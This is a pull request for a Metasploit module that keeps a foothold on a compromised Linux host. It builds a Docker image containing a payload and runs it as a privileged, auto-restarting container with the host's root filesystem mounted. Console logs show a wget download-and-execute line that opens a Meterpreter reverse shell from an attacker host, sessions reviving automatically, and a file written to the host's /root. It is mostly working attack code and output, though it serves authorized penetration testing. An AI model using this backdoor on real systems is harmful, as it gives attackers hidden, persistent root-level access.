### PR TITLE
docker image persistence module

### DIFF
--- a/documentation/modules/exploit/linux/persistence/docker_image.md
+++ b/documentation/modules/exploit/linux/persistence/docker_image.md
@@ -1,0 +1,168 @@
+## Vulnerable Application
+
+This module maintains persistence on a host by creating a docker image which runs our
+payload, and has access to the host's file system (/host in the container). Whenever the
+container restarts, the payload will run, or when the payload dies the executable
+will run again after a delay. This will allow for writing back
+into the host through cron entries, ssh keys, or other method.
+
+Verified on Ubuntu 22.04.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Get a Meterpreter session
+3. `use exploit/linux/persistence/docker_image`
+4. `set SESSION [SESSION]`
+5. `run`
+6. You should get a new session from within the docker image with `/host` mounted from `/` on the host.
+
+## Options
+
+### SLEEP
+
+How many seconds the docker image should wait before checking if the session has died and trying to re-establish it.
+Default is `600`
+
+## Scenarios
+
+### Ubuntu 22.04
+
+Get a meterpreter session
+
+```
+[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set target 7
+target => 7
+resource (/root/.msf4/msfconsole.rc)> set srvport 8082
+srvport => 8082
+resource (/root/.msf4/msfconsole.rc)> set uripath l
+uripath => l
+resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set lport 4446
+lport => 4446
+resource (/root/.msf4/msfconsole.rc)> run
+[*] Starting persistent handler(s)...
+[*] Started reverse TCP handler on 1.1.1.1:4446 
+[*] Using URL: http://1.1.1.1:8082/l
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO bLEZJjLj --no-check-certificate http://1.1.1.1:8082/l; chmod +x bLEZJjLj; ./bLEZJjLj& disown
+msf exploit(multi/script/web_delivery) > 
+[*] 2.2.2.2     web_delivery - Delivering Payload (250 bytes)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3090404 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 2.2.2.2:49368) at 2025-09-10 09:06:24 -0400
+```
+
+Install Persistence
+
+```
+msf exploit(multi/script/web_delivery) > use exploit/linux/persistence/docker_image 
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(linux/persistence/docker_image) > set session 1
+session => 1
+msf exploit(linux/persistence/docker_image) > check
+[!] Payloads in /tmp will only last until reboot, you may want to choose elsewhere.
+[*] Checking Docker availability and permissions...
+[*] The service is running, but could not be validated. docker app is installed and accessible
+msf exploit(linux/persistence/docker_image) > set payload linux/x64/meterpreter/reverse_tcp 
+payload => linux/x64/meterpreter/reverse_tcp
+msf exploit(linux/persistence/docker_image) > run
+[*] Exploit running as background job 2.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+msf exploit(linux/persistence/docker_image) > [*] Running automatic check ("set AutoCheck false" to disable)
+[!] Payloads in /tmp will only last until reboot, you may want to choose elsewhere.
+[*] Checking Docker availability and permissions...
+[!] The service is running, but could not be validated. docker app is installed and accessible
+[*] Writing backdoor to /tmp//DoEVqOGSMX
+[*] Writing '/tmp//DoEVqOGSMX' (250 bytes) ...
+[*] Temporary container created: 3e7ce0d939e06035a34a9c00a83529631838c278de745edf8ef906ca4b04127b
+[+] Persistent image created: alpine_fslaxxlv
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3090404 bytes) to 2.2.2.2
+[+] Container started with internal entrypoint: 0793ddcdab86a68dfa27ce265411550d9bce5c29b183890e4984d01137e741c6
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:47480) at 2025-09-10 09:11:32 -0400
+[*] Stopping and removing temp container
+[*] Payload installed and running with 600-second loop in container
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/2.2.2.2_20250910.1144/2.2.2.2_20250910.1144.rc
+```
+
+Show the running docker container
+
+```
+msf exploit(linux/persistence/docker_image) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > shell
+Process 16004 created.
+Channel 21 created.
+docker ps
+CONTAINER ID   IMAGE             COMMAND            CREATED          STATUS          PORTS     NAMES
+0793ddcdab86   alpine_fslaxxlv   "/entrypoint.sh"   50 seconds ago   Up 49 seconds             great_cannon
+
+exit
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Kill meterpreter to show it restart automatically
+
+```
+msf exploit(linux/persistence/docker_image) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > exit
+[*] Shutting down session: 2
+
+[*] 2.2.2.2 - Meterpreter session 2 closed.  Reason: Died
+msf exploit(linux/persistence/docker_image) >
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3090404 bytes) to 2.2.2.2
+[*] Meterpreter session 3 opened (1.1.1.1:4444 -> 2.2.2.2:56490) at 2025-09-10 09:21:32 -0400
+```
+
+Show access to the host's OS.
+
+```
+msf exploit(linux/persistence/docker_image) > sessions -i 3
+[*] Starting interaction with 3...
+
+meterpreter > cat /etc/os-release
+NAME="Alpine Linux"
+ID=alpine
+VERSION_ID=3.22.1
+PRETTY_NAME="Alpine Linux v3.22"
+HOME_URL="https://alpinelinux.org/"
+BUG_REPORT_URL="https://gitlab.alpinelinux.org/alpine/aports/-/issues"
+meterpreter > cat /host/etc/os-release
+PRETTY_NAME="Ubuntu 22.04.1 LTS"
+NAME="Ubuntu"
+VERSION_ID="22.04"
+VERSION="22.04.1 LTS (Jammy Jellyfish)"
+VERSION_CODENAME=jammy
+ID=ubuntu
+ID_LIKE=debian
+HOME_URL="https://www.ubuntu.com/"
+SUPPORT_URL="https://help.ubuntu.com/"
+BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
+PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
+UBUNTU_CODENAME=jammy
+meterpreter > shell
+Process 19 created.
+Channel 3 created.
+touch /host/root/pwnd
+ls -lah /host/root/pwnd
+-rw-r--r--    1 root     root           0 Sep 10 17:02 /host/root/pwnd
+```

--- a/modules/exploits/linux/persistence/docker_image.rb
+++ b/modules/exploits/linux/persistence/docker_image.rb
@@ -1,0 +1,155 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Unix
+  include Msf::Exploit::EXE # for generate_payload_exe
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Local::Persistence
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Docker Image Persistence',
+        'Description' => %q{
+          This module maintains persistence on a host by creating a docker image which runs our
+          payload, and has access to the host's file system (/host in the container). Whenever the
+          container restarts, the payload will run, or when the payload dies the executable
+          will run again after a delay. This will allow for writing back
+          into the host through cron entries, ssh keys, or other method.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die',
+        ],
+        'Platform' => [ 'linux' ],
+        'Arch' => [
+          # ARCH_CMD, can't always guarantee that curl and other things are on system, so binary is best
+          ARCH_X86,
+          ARCH_X64,
+          ARCH_ARMLE,
+          ARCH_AARCH64,
+          ARCH_PPC,
+          ARCH_MIPSLE,
+          ARCH_MIPSBE
+        ],
+        'SessionTypes' => [ 'meterpreter' ],
+        'Targets' => [[ 'Auto', {} ]],
+        'References' => [
+          ['ATT&CK', Mitre::Attack::Technique::T1610_DEPLOY_CONTAINER],
+        ],
+        'DisclosureDate' => '2013-03-20', # docker's release date
+        'DefaultTarget' => 0,
+        # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptInt.new('SLEEP', [false, 'How many seconds to sleep before re-executing payload', 600]),
+      ]
+    )
+  end
+
+  def check
+    print_warning('Payloads in /tmp will only last until reboot, you may want to choose elsewhere.') if writable_dir.start_with?('/tmp')
+    return CheckCode::Safe("#{writable_dir} doesnt exist") unless exists?(writable_dir)
+    return CheckCode::Safe("#{writable_dir} isnt writable") unless writable?(writable_dir)
+    return CheckCode::Safe('docker is required') unless command_exists?('docker')
+
+    vprint_status('Checking Docker availability and permissions...')
+
+    output = cmd_exec('docker ps 2>&1')
+
+    if output.include?('permission denied')
+      return CheckCode::Safe('Docker is installed but this user does not have permission to access it')
+    elsif output.include?('Cannot connect to the Docker daemon') || output.include?('Is the docker daemon running?')
+      return CheckCode::Detected('Docker appears to be installed but the daemon is not running')
+      # elsif output =~ /CONTAINER ID/
+    end
+
+    CheckCode::Detected('docker app is installed and accessible')
+  end
+
+  def install_persistence
+    # Step 1: Prepare payload
+    file_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(5..10)
+    backdoor = "#{writable_dir}/#{file_name}"
+    vprint_status("Writing backdoor to #{backdoor}")
+    upload_and_chmodx backdoor, generate_payload_exe
+
+    # Step 2: Prepare entrypoint script (loops indefinitely)
+    sleep_time = datastore['SLEEP']
+    entry_script = <<~SCRIPT
+      #!/bin/sh
+      while true; do
+        if [ -x /usr/local/bin/#{file_name} ]; then
+          # Check if it's already running
+          if ! pgrep -f "/usr/local/bin/#{file_name}" >/dev/null 2>&1; then
+            /usr/local/bin/#{file_name} &
+          fi
+        fi
+        sleep #{sleep_time}
+      done
+    SCRIPT
+
+    entry_file = "#{writable_dir}/entrypoint.sh"
+    write_file(entry_file, entry_script)
+    cmd_exec("chmod 755 #{entry_file}")
+
+    # Step 3: Pull Alpine image
+    cmd_exec('docker pull alpine')
+
+    # Step 4: Create a temporary container (stopped) to copy files in
+    tmp_container = cmd_exec('docker run -dit alpine sh').strip
+    vprint_status("Temporary container created: #{tmp_container}")
+
+    # Copy payload and entrypoint into container
+    cmd_exec("docker cp #{backdoor} #{tmp_container}:/usr/local/bin/#{file_name}")
+    cmd_exec("docker cp #{entry_file} #{tmp_container}:/")
+
+    cmd_exec("docker exec #{tmp_container} chmod +x /usr/local/bin/#{file_name}")
+    cmd_exec("docker exec #{tmp_container} chmod +x /entrypoint.sh")
+
+    # Commit a new persistent image
+    persistent_image = "alpine_#{Rex::Text.rand_text_alpha_lower(5..8)}"
+    cmd_exec("docker commit #{tmp_container} #{persistent_image}")
+    print_good("Persistent image created: #{persistent_image}")
+
+    # Remove temporary container
+    cmd_exec("docker rm #{tmp_container}")
+
+    # Step 5: Start container with internal entrypoint
+    container_id = cmd_exec("docker run -dit --privileged --restart=always #{persistent_image} /entrypoint.sh").strip
+    print_good("Container started with internal entrypoint: #{container_id}")
+
+    # Step 6: Add cleanup commands for RC
+    @clean_up_rc << "execute -f /bin/sh -a \"-c 'docker stop #{container_id}'\" -i -H"
+    @clean_up_rc << "execute -f /bin/sh -a \"-c 'docker rm #{container_id}'\" -i -H"
+    @clean_up_rc << "execute -f /bin/sh -a \"-c 'docker rmi #{persistent_image}'\" -i -H"
+
+    # Step 7: Clean up host temp files
+    rm_f backdoor
+    rm_f entry_file
+
+    # Step 8: Stop tmp image
+    print_status('Stopping and removing temp container')
+    cmd_exec("docker stop #{tmp_container}")
+    cmd_exec("docker rm #{tmp_container}")
+
+    print_status("Payload installed and running with #{sleep_time}-second loop in container")
+  end
+
+end

--- a/modules/exploits/linux/persistence/docker_image.rb
+++ b/modules/exploits/linux/persistence/docker_image.rb
@@ -49,7 +49,6 @@ class MetasploitModule < Msf::Exploit::Local
         ],
         'DisclosureDate' => '2013-03-20', # docker's release date
         'DefaultTarget' => 0,
-        # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
@@ -80,7 +79,6 @@ class MetasploitModule < Msf::Exploit::Local
       return CheckCode::Safe('Docker is installed but this user does not have permission to access it')
     elsif output.include?('Cannot connect to the Docker daemon') || output.include?('Is the docker daemon running?')
       return CheckCode::Detected('Docker appears to be installed but the daemon is not running')
-      # elsif output =~ /CONTAINER ID/
     end
 
     CheckCode::Detected('docker app is installed and accessible')
@@ -91,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Local
     file_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(5..10)
     backdoor = "#{writable_dir}/#{file_name}"
     vprint_status("Writing backdoor to #{backdoor}")
-    upload_and_chmodx backdoor, generate_payload_exe
+    upload_and_chmodx(backdoor, generate_payload_exe)
 
     # Step 2: Prepare entrypoint script (loops indefinitely)
     sleep_time = datastore['SLEEP']
@@ -109,8 +107,10 @@ class MetasploitModule < Msf::Exploit::Local
     SCRIPT
 
     entry_file = "#{writable_dir}/entrypoint.sh"
-    write_file(entry_file, entry_script)
-    cmd_exec("chmod 755 #{entry_file}")
+    unless write_file(entry_file, entry_script)
+      fail_with(Failure::UnexpectedReply, "Unable to write #{entry_file}")
+    end
+    chmod(entry_file, 0o755)
 
     # Step 3: Pull Alpine image
     cmd_exec('docker pull alpine')
@@ -144,8 +144,8 @@ class MetasploitModule < Msf::Exploit::Local
     @clean_up_rc << "execute -f /bin/sh -a \"-c 'docker rmi #{persistent_image}'\" -i -H"
 
     # Step 7: Clean up host temp files
-    rm_f backdoor
-    rm_f entry_file
+    rm_f(backdoor)
+    rm_f(entry_file)
 
     # Step 8: Stop tmp image
     print_status('Stopping and removing temp container')

--- a/modules/exploits/linux/persistence/docker_image.rb
+++ b/modules/exploits/linux/persistence/docker_image.rb
@@ -24,6 +24,8 @@ class MetasploitModule < Msf::Exploit::Local
           container restarts, the payload will run, or when the payload dies the executable
           will run again after a delay. This will allow for writing back
           into the host through cron entries, ssh keys, or other method.
+
+          Verified on Ubuntu 22.04.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -64,7 +66,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    print_warning('Payloads in /tmp will only last until reboot, you may want to choose elsewhere.') if writable_dir.start_with?('/tmp')
+    # we don't need this check since the payload is in the docker image
+    # print_warning('Payloads in /tmp will only last until reboot, you may want to choose elsewhere.') if writable_dir.start_with?('/tmp')
     return CheckCode::Safe("#{writable_dir} doesnt exist") unless exists?(writable_dir)
     return CheckCode::Safe("#{writable_dir} isnt writable") unless writable?(writable_dir)
     return CheckCode::Safe('docker is required') unless command_exists?('docker')
@@ -132,7 +135,7 @@ class MetasploitModule < Msf::Exploit::Local
     cmd_exec("docker rm #{tmp_container}")
 
     # Step 5: Start container with internal entrypoint
-    container_id = cmd_exec("docker run -dit --privileged --restart=always #{persistent_image} /entrypoint.sh").strip
+    container_id = cmd_exec("docker run -dit --privileged -v /:/host --restart=always #{persistent_image} /entrypoint.sh").strip
     print_good("Container started with internal entrypoint: #{container_id}")
 
     # Step 6: Add cleanup commands for RC


### PR DESCRIPTION
Draft module which creates a docker image on the box with our payload, and also maps `/` to `/host` allowing for easy upstream attacks of the host.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] Get a Meterpreter session
- [ ] `use exploit/linux/persistence/docker_image`
- [ ] `set SESSION [SESSION]`
- [ ] `run`
- [ ] You should get a new session from within the docker image with `/host` mounted from `/` on the host.